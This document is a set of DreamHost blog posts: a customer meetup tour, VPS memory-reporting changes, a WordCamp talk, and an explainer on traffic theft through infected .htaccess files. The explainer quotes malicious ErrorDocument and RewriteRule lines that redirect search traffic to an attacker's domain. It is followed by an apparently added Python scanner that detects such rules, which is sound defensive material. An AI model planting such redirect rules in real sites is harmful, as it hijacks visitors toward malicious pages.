The Official DreamHost Blog! Tales From the Inside!

Let us touch you.


DreamHost wants nothing more than to reach out and touch you – in six very specific areas.

(With cocktails first, of course – we are not savages.)

DreamHost's Reach Out & Touch You Tour

Our Reach Out & Touch You Tour is making its way across the United States, stopping in the six cities that, worldwide, contain the most DreamHosters.

You’ll have us all to yourself for a few hours – It’s like a dream come true!

Granted, it’s a nerdy dream where you go on a date with your web host, but still…DREAMY!

We can’t wait for you to whisper sweet nothings into our ears about what you do (and don’t) like about your current DreamHost experience. We’ll whisper back answers to any of your questions – we’ve got no secrets!

Appetizers and drinks will be provided at these 21-and-over events, and a lasting memento of the evening’s escapades will be provided to everyone in attendance. Regardless of what you may have heard, the memento will not require a round of antibiotics to fully appreciate.

Our tour kicks off this Thursday in Los Angeles. A few tickets for LA are still available and will be until Wednesday afternoon.

Tickets are also now available for Portland, Chicago, and Seattle!

New York and San Francisco wrap up our tour in May and tickets for those two events should be available soon.

Let’s both plan on letting down our defenses for one wild night to let Love in. We want to take a swim in Lake You and can only do that if your heart is open.

We hope you’ll come out and let us touch you. We hope that by the end of the night you’ll have touched us. We want to break down the barriers that have kept web host and customer so very distant over the years. We’re all just people when you get right down to it, and we all yearn for a deep emotional contact that’s been lacking in our relationship so far. Let’s make things right.

On an unrelated note, please leave all weapons at home.

Reach Out And Touch DreamHost!

Filed Under: Business, Funnyish, Insider View, Updates

Improvements to VPS reporting


Scalable Virtual Private Servers from DreamHost are a great way to ensure that you’re never paying more than you need for your hosting.

You might want more power than shared hosting can provide, but may not really need the resources and cost associated with a dedicated server. With a VPS from DreamHost you can scale your hosting’s available memory allocation in real time and immediately see how those changes affect the bottom line.

And how do you know how much memory you actually need?

Whelp, we provide all VPS customers with memory usage graphs to show exactly what your site’s been up to.

This is what they looked like:
So helpful!  Or is it?

Pretty great, right? We think so. Or we used to, anyway. Turns out they weren’t exactly helpful in the way that you really needed them to be.

We were giving you a single data point to explain your memory usage – what’s known as the resident set size. While that data is useful, the RSS represents just a portion of your overall memory usage – it’s really not enough data to make informed decisions about resource allocation.

Our new graphs look like this:

Fixed!

We’re now showing memory usage trends across your RSS (“Actual Memory”), memory used by your disk cache (“Cached Memory”), and the sum of both RSS and disk cache (“Total Memory”). That Total Memory line is really a much better indicator of where you’ll need to be.

Please note that applications can reclaim memory from cache until their RSS hits the memory limit that you’ve specified – much like any other Linux system.

We capture snapshots of your VPS metrics every 15 minutes. We’re working hard to increase the interval at which we sample data, and some progress on that particular enhancement is already in the works.

We’ve also revamped some code that will adjust and tune Apache and Nginx configurations appropriately based on your specified memory allocation. These modifications should help to improve memory management somewhat to reduce the likelihood of out-of-memory conditions. The end result is that any sudden spikes in memory usage should now occur much less frequently and be handled a bit more gracefully when they do.

We still have more plans for making our VPS reporting even better, but we wanted to get these improvements out the door to make sure our VPS customers had the best data available as quickly as possible.

We hope this helps!

Filed Under: Insider View, New Features, Updates

WordCamp – Phoenix


Attending WordCamp Phoenix?  If you said yes or nodded your head or did anything else to insinuate that you will be going then you must pencil in time to hear our very own Robert R. speak.

What will he be speaking about? Security 101, only one of the most important things to help you protect your WordPress site.

When will he be speaking?  Saturday Feb 25th at 4:15pm on the Jumpstart Track.

Here is more info on the WordCamp schedule:

http://2012.phoenix.wordcamp.org/schedule/saturday/

If you are lucky you might even get to meet another member of our DreamHost team…We call him Shredder and he knows A LOT about WordPress so I would look for him.

Robert R. was kind enough to take some time out of his day to answer a few questions that I thought would be helpful for all of you attending.

M: Tell us a bit more about what you are speaking about at WordCamp Phoenix:

R: The presentation at WordCamp Phoenix will be covering the basics of security and how you can apply them to your WordPress websites.  As well as cover a bit into the topic about what attacks we see on our network every day, and how easy it is for site owners to prevent from becoming victims of a compromise.

M: Sounds great!  Can attendees ask for your autograph?

R: No, but they can feel free to ask for my PGP/GPG key!

M: What do you like about WordPress?

R: WordPress is a fantastic content management system, but honestly the best thing I’ve seen was @photomatt getting personally involved in matters of WordPress security when new attacks are involved.

M: Last but not least, are you looking forward to eating anything delicious in Phoenix?

R: I like to go to restaurants that are good at whatever kind of food they do and I hear they have some good BBQ in Phoenix!

There you have it guys, security 101, no autographs and take him out for some BBQ!

Hope to see you all on February 25th!

Filed Under: Updates

What is Traffic Theft?


There have been some recent allegations stating that a handful of compromised websites on our network involved with domain traffic “hijacking” were somehow connected to the illegal intrusion in January that caused us to initiate a complete password reset of all FTP and SSH users.

An extensive investigation has revealed that no customer FTP or SSH user accounts have been maliciously accessed due to this password breach. The websites reported as involved with this traffic hijacking have been reviewed and the site owners notified of the issue on their sites.

Domain hijacking has been around as long as web apps have existed, and until bug-free software exists, it will continue to trouble website owners for some time to come. We wanted to explain exactly what is meant by “hijacking” to help clear up some confusion.

Have you ever wondered, “Why would anyone try to hack my website?” Many answer this by presuming they’re too small of a target to become a victim of a high-tech crime syndicate, but truth be told these criminals want your sites and they want them badly. Why? Well it all comes down to money. The more hosts they have compromised, the more money they can make.

Cyber criminals’ main intent is to hit a site and go unnoticed…until it’s time to cash out. Attackers don’t care how big or small you are, and it is more likely that a site that is run by a small business or single site owner is going to not only be behind on their security updates for any software running on their site, but it’s also unlikely that they regularly monitor their site for malicious activity.

The “cash out” phase is usually when our customers first find out that they’ve been compromised. By that time their sites are taking part in one or more unscrupulous online activities. We will be doing a short series of posts that cover the methods these attackers use as well as what you should be on the lookout for.

Today we will be going into just one of these attackers’ malicious actions, so you know a little more about what to look for.

Traffic theft: via infected .htaccess files.

If you notice your site’s traffic unexpectedly dropping, or perhaps you’ve been flagged by Google as having “malicious” content, then there’s a good chance your site has been compromised.

What the attackers may have done is set up a new “.htaccess” file on your site or infected your existing one. .htaccess files are read by your web server to govern the way your site behaves. .htaccess files can be created with rules that will steal your legitimate traffic and send the visitor to an attacker’s malicious URL. This attack originated by simply infecting a site’s pages via iframe tags, but it has since evolved to utilize .htaccess “RewriteRule” and “ErrorDocument” directives.

Here is a simple example:

ErrorDocument 403 hxxp://congatarcxisi.ru/mays/index.php
ErrorDocument 404 hxxp://congatarcxisi.ru/mays/index.php

And here is a more complicated one:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|…
RewriteRule ^(.*)$ hxxp://congatarcxisi.ru/mays/index.php [R=301,L]

(To explain the above: the attackers are basically taking any search engine traffic and redirecting it to their site.)

You can check for these types of infections on your own! Just review your site’s .htaccess files (you may need to enable viewing of hidden files in your FTP/sFTP client so you can view “.htaccess”). We are already actively scanning for these infections on our customers’ sites, so if you see an email from our Security team please make sure you review the report and take the recommended actions.
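One way to automate the .htaccess review described above, as an added example that is not DreamHost's own scanner: it flags ErrorDocument and RewriteRule directives that point off-site and marks rules guarded by a search-engine referrer condition. The function names, the keyword list and the sample file (with example.com standing in for your own domain) are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumed list of referrer keywords; extend it to match what you see in the wild.
SEARCH_ENGINES = re.compile(r"google|ask|yahoo|baidu|bing", re.I)
ABSOLUTE_URL = re.compile(r"https?://\S+", re.I)

def external_url(token, own_hosts):
    """Return token's URL if it is absolute and not on one of own_hosts."""
    m = ABSOLUTE_URL.match(token.strip('"'))
    if not m:
        return None
    host = (urlsplit(m.group(0)).hostname or "").lower()
    if any(host == h or host.endswith("." + h) for h in own_hosts):
        return None
    return m.group(0)

def scan_htaccess(text, own_hosts):
    """Return (line_no, reason, url) for each directive that sends visitors off-site."""
    findings, referer_cond = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        target = external_url(parts[2], own_hosts) if len(parts) >= 3 else None
        if directive == "errordocument" and target:
            findings.append((no, "ErrorDocument to external URL", target))
        elif directive == "rewritecond":
            # Remember a search-engine referrer test until the next RewriteRule.
            if "%{HTTP_REFERER}" in raw.upper() and SEARCH_ENGINES.search(raw):
                referer_cond = True
        elif directive == "rewriterule":
            if target:
                reason = "search-referrer redirect" if referer_cond else "external redirect"
                findings.append((no, reason, target))
            referer_cond = False  # conditions bind only to the rule that follows
    return findings

# Constructed sample file, not taken from a real site.
SAMPLE = """\
RewriteEngine On
ErrorDocument 404 /errors/404.html
ErrorDocument 403 http://redirect.example.net/landing.php
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu).*$ [NC]
RewriteRule ^(.*)$ http://redirect.example.net/landing.php [R=301,L]
RewriteRule ^old/(.*)$ https://www.example.com/new/$1 [R=301,L]
"""

if __name__ == "__main__":
    for finding in scan_htaccess(SAMPLE, ["example.com"]):
        print(finding)
```

A hit is a prompt for manual review, since legitimate redirects to third-party hosts also exist; run it over every .htaccess file in the site tree, not only the one in the document root.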

Based on the sites we have cleaned up already, these attacks have almost universally been due to insecure website software running on the site in question. You could have the best passwords in the world, but if the apps you’ve installed on your server have any security vulnerabilities or aren’t kept up to date, attackers can still find their way in.

We are open to sharing information about web-based attacks because we strongly believe in cooperation, collaboration, and responsible disclosure regarding Internet security. If you are interested in providing details related to these attacks or have questions for us, please contact our abuse team with information about any projects you may be working on that may be related to these infections and we will be glad to discuss this matter with you further.

In a follow up post I will cover the life of a web based attack when a new vulnerability is released (from 0day to 1000day), so stay tuned!

Filed Under: Insider View, Security, Updates